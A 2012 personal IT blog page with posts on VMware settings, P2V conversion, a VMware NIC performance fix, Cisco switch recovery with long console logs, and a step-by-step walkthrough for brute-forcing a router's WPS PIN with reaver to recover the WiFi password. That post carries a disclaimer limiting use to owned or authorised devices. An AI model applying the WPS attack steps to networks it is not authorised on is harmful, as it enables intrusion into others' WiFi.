adventures {in}security

VM BIOS Boot Delay

27 01 2012

Just found a nice little line to add to the VMX file.

So instead of having 0.000001 seconds to hit ESC to bring up the boot menu on your VM, you can have it wait xx milliseconds for you.

Just whack this into the bottom of the VMX file to give you 10 seconds for BIOS

bios.bootDelay = “10000”

Comments : Leave a Comment »

Categories : vmware

P2V the VMware way

26 01 2012

VMware converter standalone is a free download:

http://www.vmware.com/products/converter/

Got Yas:
Insufficient permissions to connect to xxxxxxx ADMIN$ for Windows XP machine you are trying to convert

run gpedit.msc

- Computer Configuration

- Windows Settings

- Security Settings

   - Local Policies

    - Security Option

     - Network access: Sharing and security model for local accounts

By default XP has the Sharing and security model for local accounts set to "Guest only - local users authenticate as Guest" - this needs to be changed to "Classic - local users authenticate as themselves"

This way you can access the machine remotely with the admin account & do the conversion.

Comments : Leave a Comment »
Tags: converter, P2V, tools, vmware, windows
Categories : vmware, windows

identify & crack your WPS enabled AP

25 01 2012

##DISCLAIMER## – as usual, only use on devices you have approval for or own.

I hadn’t looked much at reaver yet – although had been following the news since it was released in Dec. Reaver allows you to brute force the WPS 8 numeric digit pin (easy setup / config feature) on a WiFi AP rather than trying to brute force the PSK. WPS is enabled by default on most newer (last few years) consumer routers to get certification.

Main tools:
- reaver (crack AP) & wash (identify AP vuln to WPS brute forcing)
- the python script wpscan.py (circa 2009) allows you to fingerprint the AP (Make / Model / Serial etc) that has WPS enabled

Go here & download reaver 1.4 (latest at time of writing) – don’t just apt-get install as you don’t get wash

http://code.google.com/p/reaver-wps/downloads/list

http://code.google.com/p/reaver-wps/downloads/detail?name=reaver-1.4.tar.gz&can=2&q=

Do the install dance on your distro (works on BT5r1)

# tar zxvf reaver-1.4.tar.gz
# ./config
# make
# make install

You can also use a fun little python script called wpscan.py (not to be confused with the WordPress tool) to fingerprint the AP

http://www.sourcesec.com/category/tools/

Step 1: Interface into monitor mode

# airmon-ng start wlan0

Step 2: Identify a WPS enabled (vulnerable) AP using wash included with reaver

# wash –i mon0

Step 3: Fingerprint with wpscan.py

# ./wpscan.py –i mon0

Step 4: run reaver against it …… grab a coffee / lunch / sleep – can take several hours to brute force the WPS pin

# reaver -i mon0 -b -AP MAC ADDRESS- -v

This will [should] result in returning the pin & psk of the wifi router – you can simply then connect.

WPS PIN: ‘15736942’
WPA PSK: ‘somesecure&reallyl0ngpskhere’
AP SSID: ‘p0wn3d’

Comments : Leave a Comment »
Tags: passwords, reaver, recon, tools, wash, wireless, wpa psk, wps, wpscan
Categories : backtrack, penetration testing, wireless

Grrr – VMWare NICs !!!

17 01 2012

I use Astaro (www.astaro.com) as my main FW at home running in VMWare – and while it has been great, recently I was having some comms issues. Intermittently wont pass much traffic, some sessions hang etc.

Especially annoying was connecting via RDP to a machine in my DMZ – anyway, started doing some testing with iperf ….

Inside -> DMZ traffic

ash@mon:~$ iperf -t 60 -i 5 -c 10.0.2.240
————————————————————
Client connecting to 10.0.2.240, TCP port 5001
TCP window size: 16.0 KByte (default)
————————————————————
[ 3] local 192.168.0.210 port 42873 connected with 10.0.2.240 port 5001
[ 3] 0.0- 5.0 sec 84.7 MBytes 142 Mbits/sec
[ 3] 5.0-10.0 sec 59.6 MBytes 100 Mbits/sec
[ 3] 10.0-15.0 sec 53.8 MBytes 90.3 Mbits/sec
[ 3] 15.0-20.0 sec 75.4 MBytes 127 Mbits/sec
[ 3] 20.0-25.0 sec 312 KBytes 511 Kbits/sec
[ 3] 25.0-30.0 sec 96.0 KBytes 157 Kbits/sec
[ 3] 30.0-35.0 sec 48.0 KBytes 78.6 Kbits/sec
[ 3] 35.0-40.0 sec 48.0 KBytes 78.6 Kbits/sec
[ 3] 40.0-45.0 sec 192 KBytes 315 Kbits/sec
[ 3] 45.0-50.0 sec 48.0 KBytes 78.6 Kbits/sec
[ 3] 50.0-55.0 sec 712 KBytes 1.17 Mbits/sec
[ 3] 55.0-60.0 sec 48.0 KBytes 78.6 Kbits/sec
[ 3] 0.0-60.6 sec 275 MBytes 38.1 Mbits/sec

Pretty crappy for two VMs connected to the same ESXi host – across a virtual FW also on the same VM host. Starts out great for the first 10 seconds & then dies in the ass.

Anyway – some googling later & I found a post about the results of changing the NICs from Flexible to E1000 under VMWare – couldnt hurt, so made the switch and voila – problem solved

ash@mon:~$ iperf -t 60 -i 5 -c 10.0.2.240
————————————————————
Client connecting to 10.0.2.240, TCP port 5001
TCP window size: 16.0 KByte (default)
————————————————————
[ 3] local 192.168.0.210 port 53361 connected with 10.0.2.240 port 5001
[ 3] 0.0- 5.0 sec 95.0 MBytes 159 Mbits/sec
[ 3] 5.0-10.0 sec 83.4 MBytes 140 Mbits/sec
[ 3] 10.0-15.0 sec 99.4 MBytes 167 Mbits/sec
[ 3] 15.0-20.0 sec 96.4 MBytes 162 Mbits/sec
[ 3] 20.0-25.0 sec 99.7 MBytes 167 Mbits/sec
[ 3] 25.0-30.0 sec 92.8 MBytes 156 Mbits/sec
[ 3] 30.0-35.0 sec 90.5 MBytes 152 Mbits/sec
[ 3] 35.0-40.0 sec 90.0 MBytes 151 Mbits/sec
[ 3] 40.0-45.0 sec 94.9 MBytes 159 Mbits/sec
[ 3] 45.0-50.0 sec 90.6 MBytes 152 Mbits/sec
[ 3] 50.0-55.0 sec 90.5 MBytes 152 Mbits/sec
[ 3] 55.0-60.0 sec 84.1 MBytes 141 Mbits/sec
[ 3] 0.0-60.0 sec 1.08 GBytes 155 Mbits/sec

Muuuuch better – 155 Mbits/sec is more like it.

So – if you are having comms issues with VMs – check your NIC “Hardware” – reading through the KB article http://kb.vmware.com/selfservice/microsites/search.do?language=en_US&cmd=displayKC&externalId=1001805 – it becomes pretty clear why its crap:

Setting the NIC to Flexible works well if you have the VMWare Tools / Drivers loaded – but if you dont, its a 10Mbps NIC – and performs as such.

•Vlance — An emulated version of the AMD 79C970 PCnet32- LANCE NIC, an older 10Mbps NIC with drivers available in most 32-bit guest operating systems except Windows Vista and later. A virtual machine configured with this network adapter can use its network immediately.

•VMXNET — The VMXNET virtual network adapter has no physical counterpart. VMXNET is optimized for performance in a virtual machine. Because operating system vendors do not provide built-in drivers for this card, you must install VMware Tools to have a driver for the VMXNET network adapter available.

•Flexible — The Flexible network adapter identifies itself as a Vlance adapter when a virtual machine boots, but initializes itself and functions as either a Vlance or a VMXNET adapter, depending on which driver initializes it. With VMware Tools installed, the VMXNET driver changes the Vlance adapter to the higher performance VMXNET adapter.

•E1000 — An emulated version of the Intel 82545EM Gigabit Ethernet NIC. A driver for this NIC is not included with all guest operating systems. Typically Linux versions 2.4.19 and later, Windows XP Professional x64 Edition and later, and Windows Server 2003 (32-bit) and later include the E1000 driver.

Loading VMWare Tools = Flexible
No VMWare Tools = E1000

Comments : Leave a Comment »

Categories : vmware

HowTo: recover a wiped Cisco Catalyst

5 01 2012

Recently I aquired a nice Cisco Catalyst 2970G 24 port GB switch for free – YAY

Booting it, I quickly found that the flash had been erased for security & it dropped to the boot loader - BOO

switch: dir flash:/ Directory of flash://

15997952 bytes available (1024 bytes used)

switch:

So - here is how to recover it.

1. Putty doesnt allow for xmodem transfers – so grab Tera Term from: http://en.sourceforge.jp/projects/ttssh2/releases/

2. Grab a shiny new image for the switch: c2970-lanbasek9-tar.122-44.SE6.tar

Just to make sure there are no gremlins left, format the flash memory

switch: format flash:
Are you sure you want to format “flash:” (all data will be lost) (y/n)?y
flashfs[0]: 0 files, 1 directories
flashfs[0]: 0 orphaned files, 0 orphaned directories
flashfs[0]: Total bytes: 15998976
flashfs[0]: Bytes used: 1024
flashfs[0]: Bytes available: 15997952
flashfs[0]: flashfs fsck took 8 seconds.
Setting console baud rate to 9600…
Filesystem “flash:” formatted

switch:

Running at 9600 BAUD can take hours to transfer an image, so change the connection to the maximum supported 115200

switch: set BAUD 115200

At this point - it looks like your console session froze. Disconnect, change Tera Term to 115200 & reconnect to the console session.

Set the switch to receive the xmodem image transfer

switch: copy xmodem: flash:c2970-lanbasek9-mz.122-44.SE6.bin

Begin the xmodemtransfer in Tera Term with the extracted bin file

Go & grab a coffee / beer / whatever – a 6.7MB binary @ 6.6KB/s is going to take some time

A short while later ….

*sigh* … a watched binary never transfers …

Eventually you should see that the transfer was a success

……………………………………………………………………………………..

File “xmodem:” successfully copied to “flash:c2970-lanbasek9-mz.122-44.SE6.bin”

switch:

At this point – set the switch to boot the new image

switch: set BOOT flash:c2970-lanbasek9-mz.122-44.SE6.bin

Reset back to 9600 BAUD

switch: unset BAUD

and boot the sucker up

switch: boot
Loading “flash:c2970-lanbasek9-mz.122-44.SE6.bin”…@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
File “flash:c2970-lanbasek9-mz.122-44.SE6.bin” uncompressed and installed, entry point: 0×3000
executing…

Restricted Rights Legend

Use, duplication, or disclosure by the Government is
subject to restrictions as set forth in subparagraph
(c) of the Commercial Computer Software – Restricted
Rights clause at FAR sec. 52.227-19 and subparagraph
(c) (1) (ii) of the Rights in Technical Data and Computer
Software clause at DFARS sec. 252.227-7013.

cisco Systems, Inc.
170 West Tasman Drive
San Jose, California 95134-1706

Cisco IOS Software, C2970 Software (C2970-LANBASEK9-M), Version 12.2(44)SE6, RELEASE SOFTWARE (fc1)
Copyright (c) 1986-2009 by Cisco Systems, Inc.
Compiled Mon 09-Mar-09 18:27 by gereddy
Image text-base: 0×00003000, data-base: 0×01000000

Initializing flashfs…

flashfs[1]: 1 files, 1 directories
flashfs[1]: 0 orphaned files, 0 orphaned directories
flashfs[1]: Total bytes: 15998976
flashfs[1]: Bytes used: 6929920
flashfs[1]: Bytes available: 9069056
flashfs[1]: flashfs fsck took 1 seconds.
flashfs[1]: Initialization complete….done Initializing flashfs.

POST: CPU MIC register Tests : Begin
POST: CPU MIC register Tests : End, Status Passed

POST: PortASIC Memory Tests : Begin
POST: PortASIC Memory Tests : End, Status Passed

POST: CPU MIC interface Loopback Tests : Begin
POST: CPU MIC interface Loopback Tests : End, Status Passed

POST: PortASIC RingLoopback Tests : Begin
POST: PortASIC RingLoopback Tests : End, Status Passed

POST: PortASIC CAM Subsystem Tests : Begin
POST: PortASIC CAM Subsystem Tests : End, Status Passed

POST: PortASIC Port Loopback Tests : Begin
POST: PortASIC Port Loopback Tests : End, Status Passed

Waiting for Port download…Complete

This product contains cryptographic features and is subject to United
States and local country laws governing import, export, transfer and
use. Delivery of Cisco cryptographic products does not imply
third-party authority to import, export, distribute or use encryption.
Importers, exporters, distributors and users are responsible for
compliance with U.S. and local country laws. By using this product you
agree to comply with applicable laws and regulations. If you are unable
to comply with U.S. and local laws, return this product immediately.

A summary of U.S. laws governing Cisco cryptographic products may be found at:

http://www.cisco.com/wwl/export/crypto/tool/stqrg.html

If you require further assistance please contact us by sending email to
export@cisco.com.

cisco WS-C2970G-24TS-E (PowerPC405) processor (revision D0) with 122880K/8184K bytes of memory.
Processor board ID CSG0823P0FS
Last reset from power-on
1 Virtual Ethernet interface
28 Gigabit Ethernet interfaces
The password-recovery mechanism is enabled.

512K bytes of flash-simulated non-volatile configuration memory.
Base ethernet MAC Address : 00:11:5C:01:BE:80
Motherboard assembly number : 73-9095-04
Power supply part number : 341-0045-01
Motherboard serial number : CAT08220HSS
Power supply serial number : LIT0818014P
Model revision number : D0
Motherboard revision number : A0
Model number : WS-C2970G-24TS-E
System serial number : CSG0823P0FS
Top Assembly Part Number : 800-24261-01
Top Assembly Revision Number : E0
Hardware Board Revision Number : 0×02

Switch Ports Model SW Version SW Image
—— —– —– ———- ———-
* 1 28 WS-C2970G-24TS-E 12.2(44)SE6 C2970-LANBASEK9-M

Press RETURN to get started!

Congratulations – you just recovered your switch

At this point – its operational. The image I downloaded also includes html based gui, in the tar file – however to get this across, you need to recover first with the binary, then copy the tar across & perform a normal ios upgrade (Solarwinds-TFTP server is quick & dirty – i run tftp on my FreeNAS box).

Switch#conf t
Switch(config)#int vlan 1
Switch(config-if)#ip address 192.168.0.232 255.255.255.0
Switch(config-if)#end
Switch#
Switch#ping 192.168.0.254

Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 192.168.0.254, timeout is 2 seconds:
!!!!!
Success rate is 100 percent (5/5), round-trip min/avg/max = 1/205/1007 ms
Switch#
Switch#ping 192.168.0.220

Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 192.168.0.220, timeout is 2 seconds:
!!!!!
Success rate is 100 percent (5/5), round-trip min/avg/max = 1/203/1006 ms
Switch#

Copy across the image – overwrite the existing one & reload the switch

Switch#archive download-sw /overwrite /reload tftp://192.168.0.220/c2970-lanbasek9-tar.122-44.SE6.tar
Loading c2970-lanbasek9-tar.122-44.SE6.tar from 192.168.0.220 (via Vlan1): !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
[OK - 8785920 bytes]

Loading c2970-lanbasek9-tar.122-44.SE6.tar from 192.168.0.220 (via Vlan1): !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
examining image…
extracting info (107 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/info (360 bytes)
extracting info (107 bytes)

System Type: 0×00000000
Ios Image File Size: 0x0069CA00
Total Image File Size: 0×00861200
Minimum Dram required: 0×08000000
Image Suffix: lanbasek9-122-44.SE6
Image Directory: c2970-lanbasek9-mz.122-44.SE6
Image Name: c2970-lanbasek9-mz.122-44.SE6.bin
Image Feature: LAYER_2|SSH|3DES|MIN_DRAM_MEG=128

Old image for switch 1: unknown

Extracting images from archive into flash…
c2970-lanbasek9-mz.122-44.SE6/ (directory)
extracting c2970-lanbasek9-mz.122-44.SE6/c2970-lanbasek9-mz.122-44.SE6.bin (6928862 bytes)
c2970-lanbasek9-mz.122-44.SE6/html/ (directory)
extracting c2970-lanbasek9-mz.122-44.SE6/html/title.js (577 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/fpv.js (40716 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/toolbar.js (6383 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/more.txt (62 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/helpframework.js (865 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/combo.js (9353 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/layers.js (1616 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/forms.js (13756 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/graph.js (39650 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/graph_dash.js (18865 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/framework.js (24955 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/appsui.js (1749 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/sorttable.js (48234 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/sitewide.js (12467 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/ajax.js (28348 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/stylesheet.css (22059 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/topbanner.htm (38074 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/legend.htm (6645 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/smartports.shtml (81218 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/border.htm (251 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/portset.shtml (67018 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/cna_upgrade.htm (5641 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/monitordata.shtml (47817 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/reset.htm (6490 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/express-setup.htm (6825 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/bottombanner.htm (4108 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/telnet.shtml (5867 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/redirect.htm (1018 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/xhome.htm (10216 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/resettimer.htm (4366 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/archivestatus.shtml (2379 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/preflight.js (17121 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/sslhome.shtml (7174 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/xsetup.shtml (103146 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/homepage.htm (471 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/port.js (29 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/status.htm (8107 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/reloadstatus.shtml (846 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/resettimer.shtml (6905 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/portruntime.shtml (40479 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/menu.css (1654 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/reloadstatus.htm (425 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/softwareupgrade-top.js (7179 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/softwareupgrade-top.shtml (38094 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/toolbar.shtml (17119 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/back.htm (515 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/empty.htm (313 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/upgradestatus.shtml (564 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/menu.shtml (8022 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/health.htm (31818 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/menu.js (9207 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/portstatistics.shtml (21548 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/softwareupgrade.htm (1804 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/dashboard.shtml (116679 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/printframe.htm (369 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/topbannernofpv.shtml (12680 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/const.htm (556 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/nsback.htm (519 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/discover.shtml (12259 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/setup_report.htm (12661 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/frmwrkResource.htm (796 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/discover.js (5160 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/portstats.js (7927 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/smartports.js (7395 bytes)
c2970-lanbasek9-mz.122-44.SE6/html/en/ (directory)
extracting c2970-lanbasek9-mz.122-44.SE6/html/en/re_smartports.js (4868 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/en/charset.js (333 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/en/troubleshooting_Browser.htm (3134 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/en/re_menu.js (1281 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/en/re_xsetup.js (19856 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/en/troubleshooting_OS.htm (2569 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/en/re_portstatistics.js (1559 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/en/re_framework.js (6052 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/en/re_health.js (1893 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/en/re_portset.js (2688 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/en/troubleshooting_JavaScript.htm (8020 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/en/re_softwareupgrade.js (5872 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/en/re_preflight.js (3853 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/en/re_dashboard.js (2961 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/en/re_fpv_title.js (3700 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/en/re_portruntime.js (739 bytes)
c2970-lanbasek9-mz.122-44.SE6/html/help/ (directory)
extracting c2970-lanbasek9-mz.122-44.SE6/html/help/xsetup_help.htm (896 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/help/xsetip.htm (5226 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/help/ip_help.htm (12891 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/help/reset.htm (3124 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/help/helptoolbar.shtml (8058 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/help/help.htm (1557 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/help/support.shtml (5360 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/help/pstats.htm (12617 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/help/cna.htm (2743 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/help/toc.shtml (8618 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/help/telnet.htm (3523 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/help/xsetinit.htm (8629 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/help/psmart.htm (16121 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/help/about.htm (17845 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/help/xsetstd.htm (9357 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/help/upgrade.htm (4737 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/help/trends.htm (5580 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/help/dashbrd.htm (17328 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/help/support.htm (3631 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/help/legend.htm (10121 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/help/pstatus.htm (5659 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/help/psets.htm (4842 bytes)
c2970-lanbasek9-mz.122-44.SE6/html/images/ (directory)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/ambergreen1pix.gif (91 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/grn_vertlines_top.gif (948 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/blackamber1pix.gif (91 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/print_on.gif (1909 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/dashboard.gif (15043 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/spMultiple.gif (1087 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/linkfaulty_bead.gif (954 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/122085.gif (0 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/sfp_side_tx_gray.gif (155 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/help_off.gif (1188 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/meter_yellow.gif (59 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/blinkgreenfast1pix.gif (91 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/toolbar_back.gif (908 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/temp.gif (1717 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/spSwitch.gif (1095 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/122353.gif (3132 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/bar_lg.gif (1391 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/toolbarButtonDownRight.gif (188 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/comboArrow.gif (881 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/spacer.gif (49 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/fatal_error_big.gif (271 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/internal_gray.gif (127 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/pngsuccess.gif (1612 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/confirm.gif (515 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/faulty_bead.gif (324 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/temp_yellow.gif (1686 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/legend_off.gif (1158 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/10gig_gray.gif (225 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/gbic_rxr_for_legend.gif (1025 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/fatal_error.gif (719 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/blinkamber1pix.gif (91 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/141282.gif (2882 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/131081.gif (1320 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/10gb_sfp_type2_Vertical_gray.gif (257 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/10gig_empty.gif (199 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/131077.gif (975 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/pngfailure.gif (1742 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/fx_inverse_sidegray.gif (122 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/smartports.gif (637 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/top_left.gif (45 bytes)
extracting c2970-lanbasek9-mz.122-44.SE6/html/images/sfp_tx_gray.gif (155 bytes)
